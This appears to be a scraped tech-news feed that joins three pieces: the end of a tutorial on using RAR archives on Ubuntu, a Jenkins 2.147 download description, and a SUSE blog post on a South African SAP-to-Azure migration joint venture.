In the same way, you can update/manage the RAR files. Just type in a command using the following syntax:

rar u ArchiveName Filename

To get the list of commands for the RAR tool, just type “rar” in the terminal.

Wrapping Up

Now that you know how to use RAR files on Ubuntu, will you prefer using them over 7-zip, Zip, or Tar.xz?

Let us know your thoughts in the comments below.

About Ankush Das

A passionate technophile who also happens to be a Computer Science graduate. He has had bylines at a variety of publications that include Ubergizmo & Tech Cocktail. You will usually see cats dancing to the beautiful tunes sung by him.

Source

Download Jenkins Linux 2.147

Jenkins (also known as Jenkins CI) is the world’s most powerful open source continuous integration server, designed from the outset to provide over 300 plugins for building and testing any software project. It is a web-based application that runs on top of a Java servlet container and can be fronted by a web server such as Apache.

Features at a glance

With Jenkins, you can monitor the execution of repeated jobs, including those run by cron or similar automation software. It is easily installable and configurable, and it supports third-party plugins, distributed builds, as well as file fingerprinting.
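For example, assuming Java is installed, the self-contained WAR distribution can be launched directly from a terminal (the port is illustrative):

$ java -jar jenkins.war --httpPort=8080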

In addition, Jenkins’ highlights include after-the-fact tagging, JUnit and TestNG test reporting, support for permanent links, support for mainstream operating systems and architectures, change set support, RSS, Instant Messaging and email integration.

Getting started with Jenkins

Jenkins is an easy-to-use and easy-to-install software project, but it has a great number of advanced features, for which its developers offer a detailed getting started guide, teaching you how to start, access and administer Jenkins, as well as how to perform various operations.

For example, you will learn how to build a software project, a Maven project, a matrix project or an Android app, monitor external jobs, use Jenkins plugins, track file fingerprints, secure Jenkins, change the timezone, use other shells, split a large job into smaller pieces, use Jenkins for non-Java projects, as well as access the Jenkins script console, the command-line interface and SSH (Secure Shell).

Additionally, the user will learn how to integrate Jenkins with Drupal, Python, Perl and .NET projects, remove and disable third-party plugins, run Jenkins behind an HTTP/HTTPS proxy, and many other useful things.

Supported operating systems

Being designed for the Web, Jenkins is a platform-independent application that has been successfully tested on several GNU/Linux distributions, including Ubuntu, Debian, Red Hat Enterprise Linux, Fedora, CentOS, openSUSE and Gentoo, various BSD flavors, including FreeBSD and OpenBSD, Solaris (OpenIndiana), Microsoft Windows and Mac OS X operating systems.


Source

Joint Venture formed to ensure South African businesses seamlessly migrate to the cloud

SUSE, Microsoft, Mint & SAB&T join forces to help businesses do more with less

Blog by Matthew Lee, Cloud and Strategic Alliances Manager at SUSE

I am very pleased today, as SUSE, Microsoft South Africa, Mint and SAB&T have entered into a local joint venture designed to assist organisations across industry sectors in migrating their SAP workloads to Azure given the imminent arrival of two Microsoft data centres in Africa.

SUSE will be providing the SAP-optimised Linux operating system tuned for Azure, with Microsoft as the cloud infrastructure provider. Mint will deliver the required Azure expertise, and SAB&T will offer the SAP partner skills to support companies with the transition.

This joint venture is significant as it shows companies that the local tools, processes, programmes, and skills are in place for a successful SAP migration when the local Microsoft data centres go live. This partnership between these four experts in their field will provide the comfort levels needed when it comes to running SAP in the cloud – something South African businesses are looking for.

For Carel du Toit, CEO of the Mint Group, this partnership reflects a growing trend to deliver customer value propositions that transform their computing, storage, and communication into utilities that are easily available through cloud resources on an as-needed basis. “Opportunities exist for organisations to look at operationalising their current environments, driving down running costs, and aligning their operational cost model with the actual utilisation requirement for their solutions. Azure is a compelling hosting option for customers who are also making use of Office365 – since their SAP and Office environments would essentially be hosted in the same Azure Regions – enabling deep integration between the systems for workflow and reporting,” he says.

According to Riedwaan Bassadien, Azure Open Source Lead at Microsoft SA, cloud migrations are becoming popular with many organisations as they look to downsize their data centre footprint. “This is an opportunity for IT solution providers in the local ecosystem to help customers move to the cloud and for software vendors and start-ups to deliver cloud native solutions to Africa and the world stage. With the advent of Azure data centre regions in SA, it is seen as a big enabler.”

Tinus Brink, Director of Consulting at SAB&T feels part of this migration entails putting the skills in place to deliver an integrated offering to customers that have decided to enhance their SAP environments for a digital world. “The cloud offers numerous opportunities to deliver enhanced business value. This joint venture is designed to provide a comprehensive and professional offering that removes the challenges of migrating to the cloud, so businesses can remain focused on delivering their strategic objectives,” says Brink.

Given the infrastructure challenges that still exist in Africa, the cloud provides a viable alternative that addresses many business continuity concerns. I believe that leveraging the respective skills of our four organisations will create an enabling environment for companies to easily and cost-effectively move to the Azure-based data centres.

With mission-critical systems such as those delivered through SAP environments, companies do not have the luxury of down-time or losing data. Our joint venture is designed to deliver the best value possible and make the cloud journey an empowering one for business.

According to du Toit, a successful SAP on Azure cloud migration requires a solid partner in terms of the cloud infrastructure, an expert on deploying and configuring SAP, and a reliable and cost-effective operating system to use as a platform between these worlds. “By combining the efforts of Mint (as a Microsoft Cloud Gold Partner), SAB&T (as one of the de facto names in SAP knowledge and training in the South African market), and SUSE’s cost-effective, performant, resilient operating system specially tailored for SAP workloads, we give customers a no-compromise value proposition which covers all the bases,” he says.

Bassadien from Microsoft agrees. “I believe that each party in the joint venture brings something special to the market. It speaks of depth of expertise and high levels of trust between each party as well as trust that our joint customers can rely on. Experienced CIOs and business decision-makers know that there is no one organisation that can give you everything. What we have tried to do here is to bring together a dream team of sorts, for the benefit of our joint customers.”

 

Share with friends and colleagues on social media

Source
